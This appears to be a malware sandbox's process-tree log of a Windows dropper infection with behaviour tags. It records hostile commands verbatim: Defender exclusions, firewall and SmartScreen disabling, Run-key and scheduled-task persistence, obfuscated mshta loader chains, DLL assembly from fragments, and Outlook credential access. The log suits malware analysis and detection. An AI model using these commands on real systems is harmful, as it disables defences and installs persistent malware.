C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu166f9a8bbe80.exeThu166f9a8bbe80.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2824 -
C:\Users\Admin\Pictures\Adobe Films\FrtT6nDxGGNaNQJGpSMuoIte.exe"C:\Users\Admin\Pictures\Adobe Films\FrtT6nDxGGNaNQJGpSMuoIte.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3152
-
-
C:\Users\Admin\Pictures\Adobe Films\bdaapMn77MgXIJD9NqZPKirz.exe"C:\Users\Admin\Pictures\Adobe Films\bdaapMn77MgXIJD9NqZPKirz.exe"6⤵
- Executes dropped EXE
PID:5272 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5272 -s 3207⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1724
-
-
-
C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe"C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe"6⤵
- Executes dropped EXE
PID:5260 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRipt: ClOsE (CrEATEoBjeCT ( "wsCrIpt.shELl" ).RUn( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))7⤵PID:4504
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ("C:\Users\Admin\Pictures\Adobe Films\y1G8FfzF7rmhnTW5xkTk4_xz.exe") do taskkill /f /Im "%~nxQ"8⤵PID:1460
-
C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K99⤵PID:5720
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRipt: ClOsE (CrEATEoBjeCT ( "wsCrIpt.shELl" ).RUn( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if ""-pb0sP2z4l4ZpZ1d2K9 "" == """" for %Q IN ( ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))10⤵PID:4956
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "-pb0sP2z4l4ZpZ1d2K9 " == "" for %Q IN ("C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE") do taskkill /f /Im "%~nxQ"11⤵PID:4972
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCripT: cLOsE ( cReAteObJeCt ( "WscRIpt.ShelL"). RuN ( "CMd.exE /c eCHo | seT /P = ""MZ"" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg+ pgMY8C.~+ nmS1._ ..\SmD2fE1.N& STart control ..\SMD2fE1.N &DeL /Q * " , 0, TrUE ) )10⤵PID:3672
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c eCHo | seT /P = "MZ" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg+ pgMY8C.~+ nmS1._ ..\SmD2fE1.N& STart control ..\SMD2fE1.N &DeL /Q *11⤵PID:1104
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:3412
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>Xj5YWD.Tg"12⤵PID:6496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "12⤵PID:6488
-
-
C:\Windows\SysWOW64\control.execontrol ..\SMD2fE1.N12⤵PID:6932
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\SMD2fE1.N13⤵
- Loads dropped DLL
PID:7044 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\SMD2fE1.N14⤵PID:6268
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\SMD2fE1.N15⤵
- Loads dropped DLL
PID:4356
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /Im "y1G8FfzF7rmhnTW5xkTk4_xz.exe"9⤵
- Kills process with taskkill
PID:5156
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ZDZw711lIB8y64BEIB3m6gJV.exe"C:\Users\Admin\Pictures\Adobe Films\ZDZw711lIB8y64BEIB3m6gJV.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5248 -
C:\Users\Admin\Pictures\Adobe Films\ZDZw711lIB8y64BEIB3m6gJV.exe"C:\Users\Admin\Pictures\Adobe Films\ZDZw711lIB8y64BEIB3m6gJV.exe"7⤵
- Executes dropped EXE
PID:3436 -
C:\Users\Admin\AppData\Local\Temp\filename.exe"C:\Users\Admin\AppData\Local\Temp\filename.exe"8⤵
- Checks BIOS information in registry
- Drops startup file
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)9⤵
- Modifies security service
- Adds Run key to start application
PID:2496 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off10⤵PID:4676
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6088 -s 22249⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2028
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\qBm1tEm07kjon3FOZ_6bAk3D.exe"C:\Users\Admin\Pictures\Adobe Films\qBm1tEm07kjon3FOZ_6bAk3D.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5376 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\qBm1tEm07kjon3FOZ_6bAk3D.exe" & exit7⤵PID:3720
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
PID:2284
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\7wnnfVqm38XiveMNr17rrIJW.exe"C:\Users\Admin\Pictures\Adobe Films\7wnnfVqm38XiveMNr17rrIJW.exe"6⤵
- Executes dropped EXE
PID:5516
-
-
C:\Users\Admin\Pictures\Adobe Films\2Y0ax0F0iaoZKWHLwz824FmR.exe"C:\Users\Admin\Pictures\Adobe Films\2Y0ax0F0iaoZKWHLwz824FmR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5504 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵PID:1340
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rq8aNCX_7GMzisMtY3v4FnzZ.exe"C:\Users\Admin\Pictures\Adobe Films\rq8aNCX_7GMzisMtY3v4FnzZ.exe"6⤵
- Executes dropped EXE
PID:5492 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6944
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gC0KbqHO3ZDxpp0jTvhCiFii.exe"C:\Users\Admin\Pictures\Adobe Films\gC0KbqHO3ZDxpp0jTvhCiFii.exe"6⤵
- Executes dropped EXE
PID:5472 -
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
PID:1904
-
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
- Executes dropped EXE
PID:6028
-
-
C:\Program Files (x86)\Company\NewProduct\inst002.exe"C:\Program Files (x86)\Company\NewProduct\inst002.exe"7⤵PID:5864
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_9SCB5TlxeO2mPfwxR05MOev.exe"C:\Users\Admin\Pictures\Adobe Films\_9SCB5TlxeO2mPfwxR05MOev.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5456
-
-
C:\Users\Admin\Pictures\Adobe Films\4rvzzQeAzGVDBMspVvuZ1t25.exe"C:\Users\Admin\Pictures\Adobe Films\4rvzzQeAzGVDBMspVvuZ1t25.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5448 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\4rvzzQeAzGVDBMspVvuZ1t25.exe" & exit7⤵PID:6528
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
PID:6896
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\DxgHi7mCO9PoXuB9zH8BNOwz.exe"C:\Users\Admin\Pictures\Adobe Films\DxgHi7mCO9PoXuB9zH8BNOwz.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5436
-
-
C:\Users\Admin\Pictures\Adobe Films\cJyGPEpQWwEhNzQK_Vj4k_0n.exe"C:\Users\Admin\Pictures\Adobe Films\cJyGPEpQWwEhNzQK_Vj4k_0n.exe"6⤵PID:5428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5428 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6128
-
-
-
C:\Users\Admin\Pictures\Adobe Films\uLAUkLkggV2s3Qgdg9_4e6DG.exe"C:\Users\Admin\Pictures\Adobe Films\uLAUkLkggV2s3Qgdg9_4e6DG.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5548
-
-
C:\Users\Admin\Pictures\Adobe Films\JEi0h6D_gt3gktq40Td8HXMD.exe"C:\Users\Admin\Pictures\Adobe Films\JEi0h6D_gt3gktq40Td8HXMD.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5536
-
-
C:\Users\Admin\Pictures\Adobe Films\mL5RRfi8cNocBGUfqcRH0wRT.exe"C:\Users\Admin\Pictures\Adobe Films\mL5RRfi8cNocBGUfqcRH0wRT.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5880 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:3144 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"8⤵PID:6316
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK9⤵
- Executes dropped EXE
- Delays execution with timeout.exe
PID:2776
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\FaeWm8lHfr6EdlurtOcFMbhn.exe"C:\Users\Admin\Pictures\Adobe Films\FaeWm8lHfr6EdlurtOcFMbhn.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:5700 -
C:\Users\Admin\Pictures\Adobe Films\FaeWm8lHfr6EdlurtOcFMbhn.exe"C:\Users\Admin\Pictures\Adobe Films\FaeWm8lHfr6EdlurtOcFMbhn.exe"7⤵PID:5176
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mSngUReAgA5wzBQ9dhAfBrS5.exe"C:\Users\Admin\Pictures\Adobe Films\mSngUReAgA5wzBQ9dhAfBrS5.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4732
-
-
C:\Users\Admin\Pictures\Adobe Films\surHKlFIOl98IaTC679RP8rQ.exe"C:\Users\Admin\Pictures\Adobe Films\surHKlFIOl98IaTC679RP8rQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6132 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 17367⤵
- Program crash
PID:5128
-
-
-
C:\Users\Admin\Pictures\Adobe Films\XgEEoNZF6CBCJXeGL_a9D1b2.exe"C:\Users\Admin\Pictures\Adobe Films\XgEEoNZF6CBCJXeGL_a9D1b2.exe"6⤵
- Executes dropped EXE
PID:6120 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 2687⤵
- Program crash
PID:5224
-
-
-
C:\Users\Admin\Pictures\Adobe Films\DR5vEkjduzexsi7Qja2_MjnT.exe"C:\Users\Admin\Pictures\Adobe Films\DR5vEkjduzexsi7Qja2_MjnT.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5320
-
-
C:\Users\Admin\Pictures\Adobe Films\d_EYXTwqXMHtpnR8ybSMhjSy.exe"C:\Users\Admin\Pictures\Adobe Films\d_EYXTwqXMHtpnR8ybSMhjSy.exe"6⤵
- Executes dropped EXE
PID:5300 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5300 -s 3047⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5136
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lAbjHswwfcK8SfQWhuS3AA4p.exe"C:\Users\Admin\Pictures\Adobe Films\lAbjHswwfcK8SfQWhuS3AA4p.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1556 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵PID:3596
-
-
-
C:\Users\Admin\Pictures\Adobe Films\EprQIfWVrwBTpRY1DxBx2pcO.exe"C:\Users\Admin\Pictures\Adobe Films\EprQIfWVrwBTpRY1DxBx2pcO.exe"6⤵
- Executes dropped EXE
PID:4696 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:2640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
PID:5340
-
-
C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"7⤵PID:2032
-
C:\Users\Admin\Pictures\Adobe Films\10uvxfFDbQOvHTv_6X_00nqe.exe"C:\Users\Admin\Pictures\Adobe Films\10uvxfFDbQOvHTv_6X_00nqe.exe"8⤵PID:6652
-
-
C:\Users\Admin\Pictures\Adobe Films\piKEQ_2ZoG808LDM2Govt_1j.exe"C:\Users\Admin\Pictures\Adobe Films\piKEQ_2ZoG808LDM2Govt_1j.exe"8⤵PID:5788
-
C:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exe"9⤵
- Suspicious use of SetThreadContext
PID:724 -
C:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exe10⤵PID:4564
-
-
C:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpA682_tmp.exe10⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1244
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe"C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe"8⤵PID:2020
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"=="""" for %w iN ( ""C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))9⤵PID:1392
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""=="" for %w iN ( "C:\Users\Admin\Pictures\Adobe Films\oMnd8HW8cwFc0YultdzLDnwG.exe" ) do taskkill /f -Im "%~nXw"10⤵PID:2504
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -Im "oMnd8HW8cwFc0YultdzLDnwG.exe"11⤵
- Kills process with taskkill
PID:5480
-
-
C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd11⤵PID:6808
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""=="""" for %w iN ( ""C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))12⤵PID:7040
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "=="" for %w iN ( "C:\Users\Admin\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"13⤵PID:6644
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRipT:cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ).RuN("Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I& StArT control.exe ..\QVNGP.I & del /Q * " , 0, true ) )12⤵PID:2352
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX+ KPeo.Pvp + _OTV19C.~ +EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I&StArT control.exe ..\QVNGP.I &del /Q *13⤵PID:3796
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"14⤵PID:4852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "14⤵PID:6204
-
-
C:\Windows\SysWOW64\control.execontrol.exe ..\QVNGP.I14⤵PID:6628
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\QVNGP.I15⤵
- Loads dropped DLL
PID:6228 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\QVNGP.I16⤵PID:3400
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I17⤵
- Loads dropped DLL
PID:6608
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1DTBW6qEdrVn7PjAWxlu36X_.exe"C:\Users\Admin\Pictures\Adobe Films\1DTBW6qEdrVn7PjAWxlu36X_.exe" /mixtwo8⤵PID:6048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 2369⤵
- Program crash
PID:6648
-
-
-
C:\Users\Admin\Pictures\Adobe Films\L4ZFOrOoGmodzzY1lFutmoS6.exe"C:\Users\Admin\Pictures\Adobe Films\L4ZFOrOoGmodzzY1lFutmoS6.exe"8⤵
- Suspicious use of SetThreadContext
PID:6000 -
C:\Users\Admin\Pictures\Adobe Films\L4ZFOrOoGmodzzY1lFutmoS6.exe"C:\Users\Admin\Pictures\Adobe Films\L4ZFOrOoGmodzzY1lFutmoS6.exe"9⤵PID:6856
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ocpOgOZkWULXx7YjUS5ZFbBf.exe"C:\Users\Admin\Pictures\Adobe Films\ocpOgOZkWULXx7YjUS5ZFbBf.exe"8⤵
- Adds Run key to start application
PID:2452 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2452 -s 17329⤵
- Executes dropped EXE
- Program crash
- Enumerates system info in registry
PID:1172
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Vh92cj0r2UKOfPQgQ733mgxV.exe"C:\Users\Admin\Pictures\Adobe Films\Vh92cj0r2UKOfPQgQ733mgxV.exe"8⤵PID:4788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 2369⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6416
-
-
-
C:\Users\Admin\Pictures\Adobe Films\s0DC_nGwvVUmu0GRuA22pI2G.exe"C:\Users\Admin\Pictures\Adobe Films\s0DC_nGwvVUmu0GRuA22pI2G.exe"8⤵PID:5828
-
C:\Users\Admin\AppData\Roaming\5359476.scr"C:\Users\Admin\AppData\Roaming\5359476.scr" /S9⤵PID:5544
-
-
C:\Users\Admin\AppData\Roaming\8456642.scr"C:\Users\Admin\AppData\Roaming\8456642.scr" /S9⤵
- Suspicious behavior: SetClipboardViewer
PID:5628
-
-
C:\Users\Admin\AppData\Roaming\5787138.scr"C:\Users\Admin\AppData\Roaming\5787138.scr" /S9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6124 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
PID:5428
-
-
-
C:\Users\Admin\AppData\Roaming\2699551.scr"C:\Users\Admin\AppData\Roaming\2699551.scr" /S9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5372
-
-
C:\Users\Admin\AppData\Roaming\5099076.scr"C:\Users\Admin\AppData\Roaming\5099076.scr" /S9⤵PID:4628
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LW3X5qRkhDyQXyj0a9LDsZyP.exe"C:\Users\Admin\Pictures\Adobe Films\LW3X5qRkhDyQXyj0a9LDsZyP.exe"8⤵PID:6412
-
C:\Users\Admin\AppData\Local\Temp\is-NLTOH.tmp\LW3X5qRkhDyQXyj0a9LDsZyP.tmp"C:\Users\Admin\AppData\Local\Temp\is-NLTOH.tmp\LW3X5qRkhDyQXyj0a9LDsZyP.tmp" /SL5="$502AE,506127,422400,C:\Users\Admin\Pictures\Adobe Films\LW3X5qRkhDyQXyj0a9LDsZyP.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5864 -
C:\Users\Admin\AppData\Local\Temp\is-GDJMT.tmp\Adam.exe"C:\Users\Admin\AppData\Local\Temp\is-GDJMT.tmp\Adam.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:1036 -
C:\Program Files\Windows NT\NOOMXVPHCD\foldershare.exe"C:\Program Files\Windows NT\NOOMXVPHCD\foldershare.exe" /VERYSILENT11⤵PID:7036
-
-
C:\Users\Admin\AppData\Local\Temp\26-e976c-866-470a1-11c7e9bd7a98b\Vybykutyho.exe"C:\Users\Admin\AppData\Local\Temp\26-e976c-866-470a1-11c7e9bd7a98b\Vybykutyho.exe"11⤵PID:5228
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6748 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffca57246f8,0x7ffca5724708,0x7ffca572471813⤵PID:5192
-
-
